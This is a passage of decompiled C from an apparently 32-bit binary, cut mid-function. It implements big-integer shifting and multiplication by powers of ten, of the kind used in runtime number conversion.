														_t1260 = _t1109;
														_t1218 =  &_v468 + _t1109 * 4;
														_v1880 = _t1218;
														while(1) {
															__eflags = _t1260 - _t1061;
															if(_t1260 >= _t1061) {
																_t208 =  &_v1876;
																 *_t208 = _v1876 & 0x00000000;
																__eflags =  *_t208;
															} else {
																_v1876 =  *_t1218;
															}
															_t210 = _t1260 - 1; // 0x70
															__eflags = _t210 - _t1061;
															if(_t210 >= _t1061) {
																_t1170 = 0;
																__eflags = 0;
															} else {
																_t1170 =  *(_t1218 - 4);
															}
															_t1218 = _t1218 - 4;
															_t972 = _v1880;
															_t1260 = _t1260 - 1;
															 *_t972 = _t1170 >> 0x0000001f ^ _v1876 + _v1876;
															_v1880 = _t972 - 4;
															__eflags = _t1260 - 0xffffffff;
															if(_t1260 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														_t1242 = _v1872;
													}
													__eflags = _v1865;
													if(_v1865 == 0) {
														_v472 = _t1109;
													} else {
														_t218 = _t1109 + 1; // 0x73
														_v472 = _t218;
													}
												}
											}
											_t1194 = 1 - _t1242;
											E00D8E920(_t1194,  &_v1396, 0, 1);
											__eflags = 1;
											 *(_t1273 + 0xbad63d) = 1 << (_t1194 & 0x0000001f);
											_t805 = 0xbadbae;
										} else {
											_v1396 = _v1396 & 0x00000000;
											_t1110 = 2;
											_v1392 = 0x100000;
											_v1400 = _t1110;
											__eflags = _t1061 - _t1110;
											if(_t1061 == _t1110) {
												_t1174 = 0;
												__eflags = 0;
												while(1) {
													_t974 =  *((intOrPtr*)(_t1273 + _t1174 - 0x570));
													__eflags = _t974 -  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0));
													if(_t974 !=  *((intOrPtr*)(_t1273 + _t1174 - 0x1d0))) {
														goto L101;
													}
													_t1174 = _t1174 + 4;
													__eflags = _t1174 - 8;
													if(_t1174 != 8) {
														continue;
													} else {
														_t166 =  &_v1896;
														 *_t166 = _v1896 & 0x00000000;
														__eflags =  *_t166;
														asm("bsr eax, edi");
														if( *_t166 == 0) {
															_t1175 = 0;
															__eflags = 0;
														} else {
															_t1175 = _t974 + 1;
														}
														_t975 = 0x20;
														_t1261 = _t1110;
														__eflags = _t975 - _t1175 - _t1110;
														_t977 =  &_v460;
														_v1880 = _t977;
														_t1219 = _t977;
														_t171 =  &_v1865;
														 *_t171 = _t975 - _t1175 - _t1110 > 0;
														__eflags =  *_t171;
														while(1) {
															__eflags = _t1261 - _t1061;
															if(_t1261 >= _t1061) {
																_t173 =  &_v1876;
																 *_t173 = _v1876 & 0x00000000;
																__eflags =  *_t173;
															} else {
																_v1876 =  *_t1219;
															}
															_t175 = _t1261 - 1; // 0x0
															__eflags = _t175 - _t1061;
															if(_t175 >= _t1061) {
																_t1176 = 0;
																__eflags = 0;
															} else {
																_t1176 =  *(_t1219 - 4);
															}
															_t1219 = _t1219 - 4;
															_t981 = _v1880;
															_t1261 = _t1261 - 1;
															 *_t981 = _t1176 >> 0x0000001e ^ _v1876 << 0x00000002;
															_v1880 = _t981 - 4;
															__eflags = _t1261 - 0xffffffff;
															if(_t1261 == 0xffffffff) {
																break;
															}
															_t1061 = _v472;
														}
														__eflags = _v1865;
														_t1111 = _t1110 - _v1872;
														_v472 = (0 | _v1865 != 0x00000000) + _t1110;
														_t1221 = _t1111 >> 5;
														_v1884 = _t1111;
														_t1263 = _t1221 << 2;
														E00D8E920(_t1221,  &_v1396, 0, _t1263);
														 *(_t1273 + _t1263 - 0x570) = 1 << (_v1884 & 0x0000001f);
														_t805 = _t1221 + 1;
													}
													goto L128;
												}
											}
											goto L101;
										}
										L128:
										_v1400 = _t805;
										_t1064 = 0x1cc;
										_v936 = _t805;
										__eflags = _t805 << 2;
										E00D9AA64( &_v932, 0x1cc,  &_v1396, _t805 << 2);
										_t1279 =  &(_t1276[7]);
									} else {
										_v1396 = _v1396 & 0x00000000;
										_t1264 = 2;
										_v1392 = 0x100000;
										_v1400 = _t1264;
										__eflags = _t1061 - _t1264;
										if(_t1061 != _t1264) {
											L53:
											_t992 = _v1872 + 1;
											_t993 = _t992 & 0x0000001f;
											_t1114 = 0x20;
											_v1876 = _t993;
											_t1223 = _t992 >> 5;
											_v1872 = _t1223;
											_v1908 = _t1114 - _t993;
											_t996 = E00D8DDA0(1, _t1114 - _t993, 0);
											_t1116 =  *((intOrPtr*)(_t1273 + _t1061 * 4 - 0x1d4));
											_t997 = _t996 - 1;
											_t108 =  &_v1896;
											 *_t108 = _v1896 & 0x00000000;
											__eflags =  *_t108;
											asm("bsr ecx, ecx");
											_v1884 = _t997;
											_v1912 =  !_t997;
											if( *_t108 == 0) {
												_t1117 = 0;
												__eflags = 0;
											} else {
												_t1117 = _t1116 + 1;
											}
											_t999 = 0x20;
											_t1000 = _t999 - _t1117;
											_t1181 = _t1061 + _t1223;
											__eflags = _v1876 - _t1000;
											_v1892 = _t1181;
											_t1001 = _t1000 & 0xffffff00 | _v1876 - _t1000 > 0x00000000;
											__eflags = _t1181 - 0x73;
											_v1865 = _t1001;
											_t1118 = _t1117 & 0xffffff00 | _t1181 - 0x00000073 > 0x00000000;
											__eflags = _t1181 - 0x73;
											if(_t1181 != 0x73) {
												L59:
												_t1002 = 0;
												__eflags = 0;
											} else {
												__eflags = _t1001;
												if(_t1001 == 0) {
													goto L59;
												} else {
													_t1002 = 1;
												}
											}
											__eflags = _t1118;
											if(_t1118 != 0) {
												L81:
												__eflags = 0;
												_t1064 = 0x1cc;
												_v1400 = 0;
												_v472 = 0;
												E00D9AA64( &_v468, 0x1cc,  &_v1396, 0);
												_t1276 =  &(_t1276[4]);
											} else {
												__eflags = _t1002;
												if(_t1002 != 0) {
													goto L81;
												} else {
													_t1119 = 0x72;
													__eflags = _t1181 - _t1119;
													if(_t1181 >= _t1119) {
														_t1181 = _t1119;
														_v1892 = _t1119;
													}
													_t1012 = _t1181;
													_v1880 = _t1012;
													__eflags = _t1181 - 0xffffffff;
													if(_t1181 != 0xffffffff) {
														_t1182 = _v1872;
														_t1266 = _t1181 - _t1182;
														__eflags = _t1266;
														_t1123 =  &_v468 + _t1266 * 4;
														_v1888 = _t1123;
														while(1) {
															__eflags = _t1012 - _t1182;
															if(_t1012 < _t1182) {
																break;
															}
															__eflags = _t1266 - _t1061;
															if(_t1266 >= _t1061) {
																_t1226 = 0;
																__eflags = 0;
															} else {
																_t1226 =  *_t1123;
															}
															__eflags = _t1266 - 1 - _t1061;
															if(_t1266 - 1 >= _t1061) {
																_t1017 = 0;
																__eflags = 0;
															} else {
																_t1017 =  *(_t1123 - 4);
															}
															_t1020 = _v1880;
															_t1123 = _v1888 - 4;
															_v1888 = _t1123;
															 *(_t1273 + _t1020 * 4 - 0x1d0) = (_t1226 & _v1884) << _v1876 | (_t1017 & _v1912) >> _v1908;
															_t1012 = _t1020 - 1;
															_t1266 = _t1266 - 1;
															_v1880 = _t1012;
															__eflags = _t1012 - 0xffffffff;
															if(_t1012 != 0xffffffff) {
																_t1061 = _v472;
																continue;
															}
															break;
														}
														_t1181 = _v1892;
														_t1223 = _v1872;
														_t1264 = 2;
													}
													__eflags = _t1223;
													if(_t1223 != 0) {
														__eflags = 0;
														memset( &_v468, 0, _t1223 << 2);
														_t1276 =  &(_t1276[3]);
													}
													__eflags = _v1865;
													_t1064 = 0x1cc;
													if(_v1865 == 0) {
														_v472 = _t1181;
													} else {
														_v472 = _t1181 + 1;
													}
												}
											}
											_v1392 = _v1392 & 0x00000000;
											_v1396 = _t1264;
											_v1400 = 1;
											_v936 = 1;
											_push(4);
										} else {
											_t1127 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *((intOrPtr*)(_t1273 + _t1127 - 0x570)) -  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0));
												if( *((intOrPtr*)(_t1273 + _t1127 - 0x570)) !=  *((intOrPtr*)(_t1273 + _t1127 - 0x1d0))) {
													goto L53;
												}
												_t1127 = _t1127 + 4;
												__eflags = _t1127 - 8;
												if(_t1127 != 8) {
													continue;
												} else {
													_t1023 = _v1872 + 2;
													_t1024 = _t1023 & 0x0000001f;
													_t1128 = 0x20;
													_t1129 = _t1128 - _t1024;
													_v1888 = _t1024;
													_t1268 = _t1023 >> 5;
													_v1876 = _t1268;
													_v1908 = _t1129;
													_t1027 = E00D8DDA0(1, _t1129, 0);
													_v1896 = _v1896 & 0x00000000;
													_t1028 = _t1027 - 1;
													__eflags = _t1028;
													asm("bsr ecx, edi");
													_v1884 = _t1028;
													_v1912 =  !_t1028;
													if(_t1028 == 0) {
														_t1130 = 0;
														__eflags = 0;
													} else {
														_t1130 = _t1129 + 1;
													}
													_t1030 = 0x20;
													_t1031 = _t1030 - _t1130;
													_t1184 = _t1268 + 2;
													__eflags = _v1888 - _t1031;
													_v1880 = _t1184;
													_t1032 = _t1031 & 0xffffff00 | _v1888 - _t1031 > 0x00000000;
													__eflags = _t1184 - 0x73;
													_v1865 = _t1032;
													_t1131 = _t1130 & 0xffffff00 | _t1184 - 0x00000073 > 0x00000000;
													__eflags = _t1184 - 0x73;
													if(_t1184 != 0x73) {
														L28:
														_t1033 = 0;
														__eflags = 0;
													} else {
														__eflags = _t1032;
														if(_t1032 == 0) {
															goto L28;
														} else {
															_t1033 = 1;
														}
													}
													__eflags = _t1131;
													if(_t1131 != 0) {
														L50:
														__eflags = 0;
														_t1064 = 0x1cc;
														_v1400 = 0;
														_v472 = 0;
														E00D9AA64( &_v468, 0x1cc,  &_v1396, 0);
														_t1276 =  &(_t1276[4]);
													} else {
														__eflags = _t1033;
														if(_t1033 != 0) {
															goto L50;
														} else {
															_t1134 = 0x72;
															__eflags = _t1184 - _t1134;
															if(_t1184 >= _t1134) {
																_t1184 = _t1134;
																_v1880 = _t1134;
															}
															_t1135 = _t1184;
															_v1892 = _t1135;
															__eflags = _t1184 - 0xffffffff;
															if(_t1184 != 0xffffffff) {
																_t1185 = _v1876;
																_t1270 = _t1184 - _t1185;
																__eflags = _t1270;
																_t1043 =  &_v468 + _t1270 * 4;
																_v1872 = _t1043;
																while(1) {
																	__eflags = _t1135 - _t1185;
																	if(_t1135 < _t1185) {
																		break;
																	}
																	__eflags = _t1270 - _t1061;
																	if(_t1270 >= _t1061) {
																		_t1232 = 0;
																		__eflags = 0;
																	} else {
																		_t1232 =  *_t1043;
																	}
																	__eflags = _t1270 - 1 - _t1061;
																	if(_t1270 - 1 >= _t1061) {
																		_t1045 = 0;
																		__eflags = 0;
																	} else {
																		_t1045 =  *(_v1872 - 4);
																	}
																	_t1140 = _v1892;
																	 *(_t1273 + _t1140 * 4 - 0x1d0) = (_t1045 & _v1912) >> _v1908 | (_t1232 & _v1884) << _v1888;
																	_t1135 = _t1140 - 1;
																	_t1270 = _t1270 - 1;
																	_t1043 = _v1872 - 4;
																	_v1892 = _t1135;
																	_v1872 = _t1043;
																	__eflags = _t1135 - 0xffffffff;
																	if(_t1135 != 0xffffffff) {
																		_t1061 = _v472;
																		continue;
																	}
																	break;
																}
																_t1184 = _v1880;
																_t1268 = _v1876;
															}
															__eflags = _t1268;
															if(_t1268 != 0) {
																__eflags = 0;
																memset( &_v468, 0, _t1268 << 2);
																_t1276 =  &(_t1276[3]);
															}
															__eflags = _v1865;
															_t1064 = 0x1cc;
															if(_v1865 == 0) {
																_v472 = _t1184;
															} else {
																_v472 = _t1184 + 1;
															}
														}
													}
													_v1392 = _v1392 & 0x00000000;
													_t1038 = 4;
													__eflags = 1;
													_v1396 = _t1038;
													_v1400 = 1;
													_v936 = 1;
													_push(_t1038);
												}
												goto L52;
											}
											goto L53;
										}
										L52:
										_push( &_v1396);
										_push(_t1064);
										_push( &_v932);
										E00D9AA64();
										_t1279 =  &(_t1276[4]);
									}
									_t810 = _v1904;
									_t1084 = 0xa;
									_v1912 = _t1084;
									__eflags = _t810;
									if(_t810 < 0) {
										_t811 =  ~_t810;
										_t812 = _t811 / _t1084;
										_v1880 = _t812;
										_t1085 = _t811 % _t1084;
										_v1884 = _t1085;
										__eflags = _t812;
										if(_t812 == 0) {
											L249:
											__eflags = _t1085;
											if(_t1085 != 0) {
												_t849 =  *(0xda6a9c + _t1085 * 4);
												_v1896 = _t849;
												__eflags = _t849;
												if(_t849 == 0) {
													L260:
													__eflags = 0;
													_push(0);
													_v472 = 0;
													_v2408 = 0;
													goto L261;
												} else {
													__eflags = _t849 - 1;
													if(_t849 != 1) {
														_t1096 = _v472;
														__eflags = _t1096;
														if(_t1096 != 0) {
															_t1201 = 0;
															_t1250 = 0;
															__eflags = 0;
															do {
																_t1155 = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) >> 0x20;
																 *(_t1273 + _t1250 * 4 - 0x1d0) = _t849 *  *(_t1273 + _t1250 * 4 - 0x1d0) + _t1201;
																_t849 = _v1896;
																asm("adc edx, 0x0");
																_t1250 = _t1250 + 1;
																_t1201 = _t1155;
																__eflags = _t1250 - _t1096;
															} while (_t1250 != _t1096);
															__eflags = _t1201;
															if(_t1201 != 0) {
																_t856 = _v472;
																__eflags = _t856 - 0x73;
																if(_t856 >= 0x73) {
																	goto L260;
																} else {
																	 *(_t1273 + _t856 * 4 - 0x1d0) = _t1201;
																	_v472 = _v472 + 1;
																}
															}
														}
													}
												}
											}
										} else {
											do {
												__eflags = _t812 - 0x26;
												if(_t812 > 0x26) {
													_t812 = 0x26;
												}
												_t1097 =  *(0xda6a06 + _t812 * 4) & 0x000000ff;
												_v1872 = _t812;
												_v1400 = ( *(0xda6a06 + _t812 * 4) & 0x000000ff) + ( *(0xda6a07 + _t812 * 4) & 0x000000ff);
												E00D8E920(_t1097 << 2,  &_v1396, 0, _t1097 << 2);
												_t867 = E00D8EA80( &(( &_v1396)[_t1097]), 0xda6100 + ( *(0xda6a04 + _v1872 * 4) & 0x0000ffff) * 4, ( *(0xda6a07 + _t812 * 4) & 0x000000ff) << 2);
												_t1098 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1098;
												__eflags = _t1098 - 1;
												if(_t1098 > 1) {
													__eflags = _v472 - 1;
													if(_v472 > 1) {
														__eflags = _t1098 - _v472;
														_t1204 =  &_v1396;
														_t868 = _t867 & 0xffffff00 | _t1098 - _v472 > 0x00000000;
														__eflags = _t868;
														if(_t868 != 0) {
															_t1156 =  &_v468;
														} else {
															_t1204 =  &_v468;
															_t1156 =  &_v1396;
														}
														_v1908 = _t1156;
														__eflags = _t868;
														if(_t868 == 0) {
															_t1098 = _v472;
														}
														_v1876 = _t1098;
														__eflags = _t868;
														if(_t868 != 0) {
															_v1892 = _v472;
														}
														_t1157 = 0;
														_t1252 = 0;
														_v1864 = 0;
														__eflags = _t1098;
														if(_t1098 == 0) {
															L243:
															_v472 = _t1157;
															_t870 = _t1157 << 2;
															__eflags = _t870;
															_push(_t870);
															_t871 =  &_v1860;
															goto L244;
														} else {
															_t1205 = _t1204 -  &_v1860;
															__eflags = _t1205;
															_v1928 = _t1205;
															do {
																_t878 =  *(_t1273 + _t1205 + _t1252 * 4 - 0x740);
																_v1896 = _t878;
																__eflags = _t878;
																if(_t878 != 0) {
																	_t879 = 0;
																	_t1206 = 0;
																	_t1099 = _t1252;
																	_v1888 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L240:
																		__eflags = _t1099 - 0x73;
																		if(_t1099 == 0x73) {
																			goto L258;
																		} else {
																			_t1205 = _v1928;
																			_t1098 = _v1876;
																			goto L242;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1099 - 0x73;
																			if(_t1099 == 0x73) {
																				goto L235;
																			}
																			__eflags = _t1099 - _t1157;
																			if(_t1099 == _t1157) {
																				 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																				_t891 = _t879 + 1 + _t1252;
																				__eflags = _t891;
																				_v1864 = _t891;
																				_t879 = _v1888;
																			}
																			_t886 =  *(_v1908 + _t879 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t886 * _v1896 + _t1206;
																			asm("adc edx, 0x0");
																			_t879 = _v1888 + 1;
																			_t1099 = _t1099 + 1;
																			_v1888 = _t879;
																			_t1206 = _t886 * _v1896 >> 0x20;
																			_t1157 = _v1864;
																			__eflags = _t879 - _v1892;
																			if(_t879 != _v1892) {
																				continue;
																			} else {
																				goto L235;
																			}
																			while(1) {
																				L235:
																				__eflags = _t1206;
																				if(_t1206 == 0) {
																					goto L240;
																				}
																				__eflags = _t1099 - 0x73;
																				if(_t1099 == 0x73) {
																					goto L258;
																				} else {
																					__eflags = _t1099 - _t1157;
																					if(_t1099 == _t1157) {
																						_t558 = _t1273 + _t1099 * 4 - 0x740;
																						 *_t558 =  *(_t1273 + _t1099 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t558;
																						_t564 = _t1099 + 1; // 0x1
																						_v1864 = _t564;
																					}
																					_t884 = _t1206;
																					_t1206 = 0;
																					 *(_t1273 + _t1099 * 4 - 0x740) =  *(_t1273 + _t1099 * 4 - 0x740) + _t884;
																					_t1157 = _v1864;
																					asm("adc edi, edi");
																					_t1099 = _t1099 + 1;
																					continue;
																				}
																				goto L246;
																			}
																			goto L240;
																		}
																		goto L235;
																	}
																} else {
																	__eflags = _t1252 - _t1157;
																	if(_t1252 == _t1157) {
																		 *(_t1273 + _t1252 * 4 - 0x740) =  *(_t1273 + _t1252 * 4 - 0x740) & _t878;
																		_t526 = _t1252 + 1; // 0x1
																		_t1157 = _t526;
																		_v1864 = _t1157;
																	}
																	goto L242;
																}
																goto L246;
																L242:
																_t1252 = _t1252 + 1;
																__eflags = _t1252 - _t1098;
															} while (_t1252 != _t1098);
															goto L243;
														}
													} else {
														_t1207 = _v468;
														_v472 = _t1098;
														E00D9AA64( &_v468, _t1064,  &_v1396, _t1098 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1207;
														if(_t1207 == 0) {
															goto L203;
														} else {
															__eflags = _t1207 - 1;
															if(_t1207 == 1) {
																goto L245;
															} else {
																__eflags = _v472;
																if(_v472 == 0) {
																	goto L245;
																} else {
																	_t1100 = 0;
																	_v1896 = _v472;
																	_t1253 = 0;
																	__eflags = 0;
																	do {
																		_t900 = _t1207;
																		_t1158 = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) >> 0x20;
																		 *(_t1273 + _t1253 * 4 - 0x1d0) = _t900 *  *(_t1273 + _t1253 * 4 - 0x1d0) + _t1100;
																		asm("adc edx, 0x0");
																		_t1253 = _t1253 + 1;
																		_t1100 = _t1158;
																		__eflags = _t1253 - _v1896;
																	} while (_t1253 != _v1896);
																	goto L208;
																}
															}
														}
													}
												} else {
													_t1208 = _v1396;
													__eflags = _t1208;
													if(_t1208 != 0) {
														__eflags = _t1208 - 1;
														if(_t1208 == 1) {
															goto L245;
														} else {
															__eflags = _v472;
															if(_v472 == 0) {
																goto L245;
															} else {
																_t1101 = 0;
																_v1896 = _v472;
																_t1254 = 0;
																__eflags = 0;
																do {
																	_t905 = _t1208;
																	_t1159 = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) >> 0x20;
																	 *(_t1273 + _t1254 * 4 - 0x1d0) = _t905 *  *(_t1273 + _t1254 * 4 - 0x1d0) + _t1101;
																	asm("adc edx, 0x0");
																	_t1254 = _t1254 + 1;
																	_t1101 = _t1159;
																	__eflags = _t1254 - _v1896;
																} while (_t1254 != _v1896);
																L208:
																__eflags = _t1100;
																if(_t1100 == 0) {
																	goto L245;
																} else {
																	_t903 = _v472;
																	__eflags = _t903 - 0x73;
																	if(_t903 >= 0x73) {
																		L258:
																		_v2408 = 0;
																		_v472 = 0;
																		E00D9AA64( &_v468, _t1064,  &_v2404, 0);
																		_t1279 =  &(_t1279[4]);
																		_t874 = 0;
																	} else {
																		 *(_t1273 + _t903 * 4 - 0x1d0) = _t1100;
																		_v472 = _v472 + 1;
																		goto L245;
																	}
																}
															}
														}
													} else {
														L203:
														_v2408 = 0;
														_v472 = 0;
														_push(0);
														_t871 =  &_v2404;
														L244:
														_push(_t871);
														_push(_t1064);
														_push( &_v468);
														E00D9AA64();
														_t1279 =  &(_t1279[4]);
														L245:
														_t874 = 1;
													}
												}
												L246:
												__eflags = _t874;
												if(_t874 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_v472 = _v472 & 0x00000000;
													_push(0);
													L261:
													_push( &_v2404);
													_t852 =  &_v468;
													goto L262;
												} else {
													goto L247;
												}
												goto L263;
												L247:
												_t812 = _v1880 - _v1872;
												__eflags = _t812;
												_v1880 = _t812;
											} while (_t812 != 0);
											_t1085 = _v1884;
											goto L249;
										}
									} else {
										_t908 = _t810 / _t1084;
										_v1908 = _t908;
										_t1102 = _t810 % _t1084;
										_v1896 = _t1102;
										__eflags = _t908;
										if(_t908 == 0) {
											L184:
											__eflags = _t1102;
											if(_t1102 != 0) {
												_t1209 =  *(0xda6a9c + _t1102 * 4);
												__eflags = _t1209;
												if(_t1209 != 0) {
													__eflags = _t1209 - 1;
													if(_t1209 != 1) {
														_t909 = _v936;
														_v1896 = _t909;
														__eflags = _t909;
														if(_t909 != 0) {
															_t1255 = 0;
															_t1103 = 0;
															__eflags = 0;
															do {
																_t910 = _t1209;
																_t1163 = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) >> 0x20;
																 *(_t1273 + _t1103 * 4 - 0x3a0) = _t910 *  *(_t1273 + _t1103 * 4 - 0x3a0) + _t1255;
																asm("adc edx, 0x0");
																_t1103 = _t1103 + 1;
																_t1255 = _t1163;
																__eflags = _t1103 - _v1896;
															} while (_t1103 != _v1896);
															__eflags = _t1255;
															if(_t1255 != 0) {
																_t913 = _v936;
																__eflags = _t913 - 0x73;
																if(_t913 >= 0x73) {
																	goto L186;
																} else {
																	 *(_t1273 + _t913 * 4 - 0x3a0) = _t1255;
																	_v936 = _v936 + 1;
																}
															}
														}
													}
												} else {
													L186:
													_v2408 = 0;
													_v936 = 0;
													_push(0);
													goto L190;
												}
											}
										} else {
											do {
												__eflags = _t908 - 0x26;
												if(_t908 > 0x26) {
													_t908 = 0x26;
												}
												_t1104 =  *(0xda6a06 + _t908 * 4) & 0x000000ff;
												_v1888 = _t908;
												_v1400 = ( *(0xda6a06 + _t908 * 4) & 0x000000ff) + ( *(0xda6a07 + _t908 * 4) & 0x000000ff);
												E00D8E920(_t1104 << 2,  &_v1396, 0, _t1104 << 2);
												_t926 = E00D8EA80( &(( &_v1396)[_t1104]), 0xda6100 + ( *(0xda6a04 + _v1888 * 4) & 0x0000ffff) * 4, ( *(0xda6a07 + _t908 * 4) & 0x000000ff) << 2);
												_t1105 = _v1400;
												_t1279 =  &(_t1279[6]);
												_v1892 = _t1105;
												__eflags = _t1105 - 1;
												if(_t1105 > 1) {
													__eflags = _v936 - 1;
													if(_v936 > 1) {
														__eflags = _t1105 - _v936;
														_t1212 =  &_v1396;
														_t927 = _t926 & 0xffffff00 | _t1105 - _v936 > 0x00000000;
														__eflags = _t927;
														if(_t927 != 0) {
															_t1164 =  &_v932;
														} else {
															_t1212 =  &_v932;
															_t1164 =  &_v1396;
														}
														_v1876 = _t1164;
														__eflags = _t927;
														if(_t927 == 0) {
															_t1105 = _v936;
														}
														_v1880 = _t1105;
														__eflags = _t927;
														if(_t927 != 0) {
															_v1892 = _v936;
														}
														_t1165 = 0;
														_t1257 = 0;
														_v1864 = 0;
														__eflags = _t1105;
														if(_t1105 == 0) {
															L177:
															_v936 = _t1165;
															_t929 = _t1165 << 2;
															__eflags = _t929;
															goto L178;
														} else {
															_t1213 = _t1212 -  &_v1860;
															__eflags = _t1213;
															_v1928 = _t1213;
															do {
																_t937 =  *(_t1273 + _t1213 + _t1257 * 4 - 0x740);
																_v1884 = _t937;
																__eflags = _t937;
																if(_t937 != 0) {
																	_t938 = 0;
																	_t1214 = 0;
																	_t1106 = _t1257;
																	_v1872 = 0;
																	__eflags = _v1892;
																	if(_v1892 == 0) {
																		L174:
																		__eflags = _t1106 - 0x73;
																		if(_t1106 == 0x73) {
																			goto L187;
																		} else {
																			_t1213 = _v1928;
																			_t1105 = _v1880;
																			goto L176;
																		}
																	} else {
																		while(1) {
																			__eflags = _t1106 - 0x73;
																			if(_t1106 == 0x73) {
																				goto L169;
																			}
																			__eflags = _t1106 - _t1165;
																			if(_t1106 == _t1165) {
																				 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
																				_t950 = _t938 + 1 + _t1257;
																				__eflags = _t950;
																				_v1864 = _t950;
																				_t938 = _v1872;
																			}
																			_t945 =  *(_v1876 + _t938 * 4);
																			asm("adc edx, 0x0");
																			 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t945 * _v1884 + _t1214;
																			asm("adc edx, 0x0");
																			_t938 = _v1872 + 1;
																			_t1106 = _t1106 + 1;
																			_v1872 = _t938;
																			_t1214 = _t945 * _v1884 >> 0x20;
																			_t1165 = _v1864;
																			__eflags = _t938 - _v1892;
																			if(_t938 != _v1892) {
																				continue;
																			} else {
																				goto L169;
																			}
																			while(1) {
																				L169:
																				__eflags = _t1214;
																				if(_t1214 == 0) {
																					goto L174;
																				}
																				__eflags = _t1106 - 0x73;
																				if(_t1106 == 0x73) {
																					L187:
																					__eflags = 0;
																					_v2408 = 0;
																					_v936 = 0;
																					_push(0);
																					_t940 =  &_v2404;
																					goto L188;
																				} else {
																					__eflags = _t1106 - _t1165;
																					if(_t1106 == _t1165) {
																						_t370 = _t1273 + _t1106 * 4 - 0x740;
																						 *_t370 =  *(_t1273 + _t1106 * 4 - 0x740) & 0x00000000;
																						__eflags =  *_t370;
																						_t376 = _t1106 + 1; // 0x1
																						_v1864 = _t376;
																					}
																					_t943 = _t1214;
																					_t1214 = 0;
																					 *(_t1273 + _t1106 * 4 - 0x740) =  *(_t1273 + _t1106 * 4 - 0x740) + _t943;
																					_t1165 = _v1864;
																					asm("adc edi, edi");
																					_t1106 = _t1106 + 1;
																					continue;
																				}
																				goto L181;
																			}
																			goto L174;
																		}
																		goto L169;
																	}
																} else {
																	__eflags = _t1257 - _t1165;
																	if(_t1257 == _t1165) {
																		 *(_t1273 + _t1257 * 4 - 0x740) =  *(_t1273 + _t1257 * 4 - 0x740) & _t937;
																		_t338 = _t1257 + 1; // 0x1
																		_t1165 = _t338;
																		_v1864 = _t1165;
																	}
																	goto L176;
																}
																goto L181;
																L176:
																_t1257 = _t1257 + 1;
																__eflags = _t1257 - _t1105;
															} while (_t1257 != _t1105);
															goto L177;
														}
													} else {
														_t1215 = _v932;
														_v936 = _t1105;
														E00D9AA64( &_v932, _t1064,  &_v1396, _t1105 << 2);
														_t1279 =  &(_t1279[4]);
														__eflags = _t1215;
														if(_t1215 != 0) {
															__eflags = _t1215 - 1;
															if(_t1215 == 1) {
																goto L180;
															} else {
																__eflags = _v936;
																if(_v936 == 0) {
																	goto L180;
																} else {
																	_t1107 = 0;
																	_v1884 = _v936;
																	_t1258 = 0;
																	__eflags = 0;
																	do {
																		_t958 = _t1215;
																		_t1166 = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) >> 0x20;
																		 *(_t1273 + _t1258 * 4 - 0x3a0) = _t958 *  *(_t1273 + _t1258 * 4 - 0x3a0) + _t1107;
																		asm("adc edx, 0x0");
																		_t1258 = _t1258 + 1;
																		_t1107 = _t1166;
																		__eflags = _t1258 - _v1884;
																	} while (_t1258 != _v1884);
																	goto L149;
																}
															}
														} else {
															_v1400 = 0;
															_v936 = 0;
															_push(0);
															_t930 =  &_v1396;
															goto L179;
														}
													}
												} else {
													_t1216 = _v1396;
													__eflags = _t1216;
													if(_t1216 != 0) {
														__eflags = _t1216 - 1;
														if(_t1216 == 1) {
															goto L180;
														} else {
															__eflags = _v936;
															if(_v936 == 0) {
																goto L180;
															} else {
																_t1108 = 0;
																_v1884 = _v936;
																_t1259 = 0;
																__eflags = 0;
																do {
																	_t965 = _t1216;
																	_t1167 = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) >> 0x20;
																	 *(_t1273 + _t1259 * 4 - 0x3a0) = _t965 *  *(_t1273 + _t1259 * 4 - 0x3a0) + _t1108;
																	asm("adc edx, 0x0");
																	_t1259 = _t1259 + 1;
																	_t1108 = _t1167;
																	__eflags = _t1259 - _v1884;
																} while (_t1259 != _v1884);
																L149:
																__eflags = _t1107;
																if(_t1107 == 0) {
																	goto L180;
																} else {
																	_t961 = _v936;
																	__eflags = _t961 - 0x73;
																	if(_t961 < 0x73) {
																		 *(_t1273 + _t961 * 4 - 0x3a0) = _t1107;
																		_v936 = _v936 + 1;
																		goto L180;
																	} else {
																		_v1400 = 0;
																		_v936 = 0;
																		_push(0);
																		_t940 =  &_v1396;
																		L188:
																		_push(_t940);
																		_push(_t1064);
																		_push( &_v932);
																		E00D9AA64();
																		_t1279 =  &(_t1279[4]);
																		_t933 = 0;
																	}
																}
															}
														}
													} else {
														_t929 = 0;
														_v1864 = 0;
														_v936 = 0;
														L178:
														_push(_t929);
														_t930 =  &_v1860;
														L179:
														_push(_t930);
														_push(_t1064);
														_push( &_v932);
														E00D9AA64();
														_t1279 =  &(_t1279[4]);
														L180:
														_t933 = 1;
													}
												}
												L181:
												__eflags = _t933;
												if(_t933 == 0) {
													_v2408 = _v2408 & 0x00000000;
													_t404 =  &_v936;
													 *_t404 = _v936 & 0x00000000;
													__eflags =  *_t404;
													_push(0);
													L190:
													_push( &_v2404);
													_t852 =  &_v932;
													L262:
													_push(_t1064);
													_push(_t852);
													E00D9AA64();
													_t1279 =  &(_t1279[4]);
												} else {
													goto L182;
												}
												goto L263;
												L182:
												_t908 = _v1908 - _v1888;
												__eflags = _t908;
